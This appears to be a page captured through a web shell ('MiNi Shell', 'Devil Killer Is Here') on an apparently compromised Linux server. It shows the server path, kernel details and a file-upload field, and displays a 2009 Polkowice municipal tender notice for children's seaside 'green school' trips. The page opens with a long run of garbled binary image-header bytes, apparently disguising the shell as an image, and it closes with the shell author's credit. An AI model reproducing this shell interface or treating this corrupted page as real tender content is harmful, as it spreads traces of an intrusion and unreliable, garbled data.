JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/34291-N-2009.html

<p class="kh_header"><b>Polkowice: Zielona szkoła- zorganizowanie dwóch 21-dniowych turnusów śródrocznego wypoczynku uczniów klas III szkół podstawowych z terenu gminy Polkowice</b><br>
<b>Numer ogłoszenia: 34291 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polkowice , Rynek 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 84 74 121, faks 076 72 46 780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zielona szkoła- zorganizowanie dwóch 21-dniowych turnusów śródrocznego wypoczynku uczniów klas III szkół podstawowych z terenu gminy Polkowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Założenia organizacyjne:
1. Zorganizowanie dwóch 21-dniowych turnusów dla ok. 305 osób łącznie w tym dla ok. 283 dzieci z terenu gminy Polkowice - uczniów klas III (w tym 5 dzieci niepełnosprawnych):
I turnus ok. 162 osoby:  ok. 150 dzieci (w tym ok. 5 niepełnosprawnych),  ok. 11 nauczycieli, 1 kierownik turnusu,
II turnus ok. 143 osoby:  ok. 133 dzieci, ok. 9 nauczycieli i 1 kierownik turnusu.
UWAGA !
Podczas turnusów będzie prowadzony program apiterapii przez: ok. 5 pielęgniarek na I-szym turnusie i ok. 5 pielęgniarek na II-gim turnusie.
Osoby te będą zatrudnione przez realizatora programu apiterapii, który poniesie koszty pobytu i transportu pielęgniarek. 
2. Bezpłatny pobyt i przejazd kadry pedagogicznej (nauczycieli i kierowników):
- I turnus ok. 11 nauczycieli i 1 kierownik zielonej szkoły,
- II turnus ok. 9 nauczycieli  1 kierownik zielonej szkoły. 
3. Transport uczestników komfortowymi autokarami z klimatyzacją.
4. Przez cały czas trwania turnusów dyspozycyjny samochód z kierowcą do przewozu osób w nagłych potrzebach.
5. Ubezpieczenie uczestników: dzieci, kadry pedagogicznej i medycznej od następstw nieszczęśliwych wypadków oraz ubezpieczenie OC opiekunów na co najmniej 10.000 zł (słownie : dziesięć tysięcy złotych) na osobę w trakcie przejazdów i pobytu.
6. Organizacja zajęć kulturalno-oświatowych typu: dyskoteki, konkursy, zajęcia sportowo-rekreacyjne, ogniska z pieczeniem kiełbasek itp. 
7. Przeprowadzenie conajmniej jednej wycieczki krajoznawczej autokarowej 
z przewodnikiem i biletami wstępu. 
8. Przygotowanie suchego prowiantu na drogę dla wszystkich uczestników.
Warunki lokalowe
1. Położenie ośrodka w pasie nadmorskim woj. zachodniopomorskiego lub woj. pomorskiego w maksymalnej odległości do 1.000 m od morza (mierzone najkrótszym ciągiem pieszym od granicy ośrodka do wejścia na plażę).
2. Teren wokół ośrodka musi być ogrodzony i wyposażony w co najmniej dwa boiska wielofunkcyjne (do piłki ręcznej, piłki nożnej i piłki siatkowej) oraz min. 2 place zabaw dla dzieci. Ośrodek powinien mieć zapewnioną całodobową ochronę.
3. Budynki murowane o podobnym standardzie (estetyce, powierzchni pokoi i innych pomieszczeń, liczbie łóżek w pokojach), maksymalnie parter i trzy piętra.
W budynkach powinna być możliwość ogrzewania pomieszczeń w chłodne dni.
4. Pokoje 2,3,4 osobowe, bez łóżek piętrowych, wyposażone w pełny węzeł sanitarny (jeżeli wykonawca będzie proponował tzw. studia, to węzeł sanitarny może przypadać na maksymalnie 6 osób) o takim samym standardzie, podobnym wyposażeniu i estetyce.
5. Wyposażenie kwaterunkowe musi być w dobrym stanie technicznym, nie może zagrażać bezpieczeństwu i zdrowiu uczestników. Łóżka do spania muszą być wyposażone w pościel, kołdrę, koc i poduszkę.
6. Oddzielne pokoje dla kadry pedagogicznej.
7. Ośrodek powinien posiadać: 
- gabinet lekarski wyposażony w odpowiedni sprzęt, 
- dwie izolatki w tym jedną z pełnym węzłem sanitarnym, 
- pomieszczenie do prowadzenia działalności kulturalnej m.in. do organizowania dyskotek, 
- salę gimnastyczną do prowadzenia zajęć ruchowych w razie niepogody,
- bazę dydaktyczną do prowadzenia zajęć lekcyjnych, czyli co najmniej 6-7 sal lekcyjnych dla min. 20 osób każda, wyposażonych w tablice,
- salę tv wyposażoną w sprzęt audiowizualny dla 50-70 osób,
- możliwość zakwaterowania dzieci niepełnosprawnych - wejście dostosowane do potrzeb osób niepełnosprawnych, pokoje z węzłem sanitarnym dostosowane do potrzeb około 5 dzieci niepełnosprawnych).
8. Wykonawca powinien dysponować sprzętem sportowym i turystycznym udostępnianym nieodpłatnie.
Wyżywienie
1. Wyżywienie dzieci i kadry pedagogicznej w stołówce ośrodka w postaci trzech podstawowych posiłków oraz podwieczorka.
2. Możliwość korzystania z posiłków dietetycznych zgodnie ze wskazaniami lekarza.
Kadra
1. Zatrudnienie kadry pedagogicznej (ustala się jedną osobę kadry pedagogicznej na 15 osobową grupę dzieci, dwie osoby w klasie integracyjnej ze względu na dzieci niepełnosprawne i po jednym kierowniku na każdy turnusu) wskazanych przez Zleceniodawcę z wynagrodzeniem:
- 1.000 zł brutto dla nauczyciela za jeden turnus,
- 2.100 zł brutto dla kierownika turnusu za jeden turnus
Uwaga! Osobami wskazanymi przez Zleceniodawcę mogą być również emeryci.
W trakcie oceny ofert Zamawiający zastrzega sobie prawo do dokonania oględzin obiektów służących wykonaniu zamówienia celem zbadania ich zgodności z informacjami podanymi w ofercie Wykonawcy z zastrzeżeniem art. 24 ust 2, pkt. 2 ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655 tekst jednolity z późn. zmianami)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium - 5.000 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w przetargu dopuszczeni zostaną Wykonawcy, którzy:
1.	Spełnią warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych.
2.	Spełnią warunki określone w specyfikacji istotnych warunków zamówienia, a w szczególności spełnią poniższe warunki:
- są uprawnieni do występowania w obrocie prawnym zgodnie z wymogami ustawowymi,
- wykażą należyte wykonanie, w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jednej usługi o charakterze podobnym do przedmiotu niniejszego zamówienia (organizacja zielonych szkół)z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych zadań (np. referencje),
- posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000 zł, wraz z dowodem uiszczenia należnych składek. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy, w przypadku kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu,
- zobowiąże się do spełnienia warunków określonych w Rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 8 listopada 2001 r. w sprawie warunków i sposobu organizowania przez publiczne przedszkola, szkoły i placówki krajoznawstwa i turystyki (Dz. U. Nr 135, poz. 1516) oraz w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 ze zmianami),
- posiadają wypełnioną kartę kwalifikacyjną obiektu, w którym ma być wykonany przedmiot zamówienia w rozumieniu Rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 ze zmianami),
- zobowiążą się do zatrudnienia wskazanej przez Zleceniodawcę kadry opiekuńczo-wychowawczej z wynagrodzeniem - 1.000 zł brutto dla opiekuna za jeden turnus (zakłada się jedną osobę kadry opiekuńczo-wychowawczej na 15 osobową grupę dzieci), 2.100 zł brutto dla kierownika turnusu za jeden turnus.
- zapewnią środki transportu (autokary z klimatyzacją) niezbędne do przewiezienia jednorazowo do 180 osób, którymi dysponują (własność, umowa leasingu, użyczenia, najmu itp.) lub przy pomocy podwykonawcy,
- dysponują sprzętem sportowym i turystycznym udostępnianym nieodpłatnie,  
- zobowiążą się do ubezpieczenia uczestników od następstw nieszczęśliwych wypadków oraz ubezpieczenia OC opiekunów na co najmniej 10.000 zł (słownie: dziesięć tysięcy złotych) na osobę w trakcie przejazdów i pobytu. 
- wniosą wadium przed upływem terminu składania ofert.
Ocena spełnienia warunków udziału ma charakter eliminacyjny. Do udziału w postępowaniu dopuszczeni zostaną wykonawcy, którzy spełniają wszystkie warunki udziału w postępowaniu. Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia/nie spełnia na podstawie oświadczenia oraz przedłożonych wraz z ofertą dokumentów wymienionych poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty potwierdzające spełnienie warunków uczestnictwa w postępowaniu i wymogów specyfikacji:
a) oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy i o przyjęciu warunków SIWZ,
b) aktualny odpis z Krajowego Rejestru Sądowego albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert,
c) pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika,
d) wykaz obejmujący wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jednej usługi o charakterze podobnym do przedmiotu niniejszego zamówienia (organizacja zielonych szkół) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych zadań (np. referencje),
e) polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000 zł, wraz z dowodem uiszczenia należnych składek; ubezpieczenie powinno być ważne przez cały okres realizacji umowy; w przypadku kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu,
f) oświadczenie o spełnieniu warunków określonych w Rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 8 listopada 2001 r. w sprawie warunków i sposobu organizowania przez publiczne przedszkola, szkoły i placówki krajoznawstwa i turystyki (Dz. U. Nr 135, poz. 1516) oraz Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 ze zmianami),
g) karta kwalifikacyjna obiektu, w którym ma być wykonany przedmiot zamówienia w rozumieniu Rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. Nr 12, poz. 67 ze zmianami),
h) oświadczenie, w którym Wykonawca zobowiąże się do zatrudnienia wskazanej przez Zleceniodawcę kadry opiekuńczo-wychowawczej z wynagrodzeniem - 1.000 zł brutto dla opiekuna za jeden turnus (zakłada się jedną osobę kadry opiekuńczo-wychowawczej na 15 osobową grupę dzieci), 2.100 zł brutto dla kierownika turnusu za jeden turnus,
i) oświadczenie, w którym Wykonawca zobowiąże się do ubezpieczenia uczestników turnusów od następstw nieszczęśliwych wypadków oraz ubezpieczenia OC opiekunów na co najmniej 10.000 zł (słownie: dziesięć tysięcy złotych) na osobę w trakcie przejazdów i pobytu,
k) oświadczenie o posiadaniu (tytuł prawny do używania np. własność, dzierżawa, najem, leasing, użyczenie itp.) środków transportu (autokary z klimatyzacją) niezbędnych do przewiezienia jednorazowo do 180 osób, których wykaz zamieszczony zostanie w załączniku Potencjał techniczny, lub oświadczenie o zatrudnieniu podwykonawcy posiadającego w/w środki transportu niezbędne do wykonania przedmiotu zamówienia (załącznik nr 2 Oświadczenia wykonawcy do Formularza ofertowego),
l) oświadczenie o posiadaniu (tytuł prawny do używania np. własność, dzierżawa, najem, leasing, użyczenie itp.) sprzętu sportowego i turystycznego, których wykaz zamieszczony zostanie w załączniku Potencjał techniczny,
m) kserokopia dowodu wniesienia wadium podpisana za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela, dopuszcza się przedłożenie wyżej wymienionego dokumentu do wglądu członkom komisji przetargowej, w trakcie otwarcia ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.ug.polkowice.pl/?ID2=przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy, ul. Rynek 1 , 59-100 Polkowice, pok. nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2009 godzina 10:00, miejsce: Urząd Gminy, ul. Rynek 1 , 59-100 Polkowice, Kancelaria - pok. nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com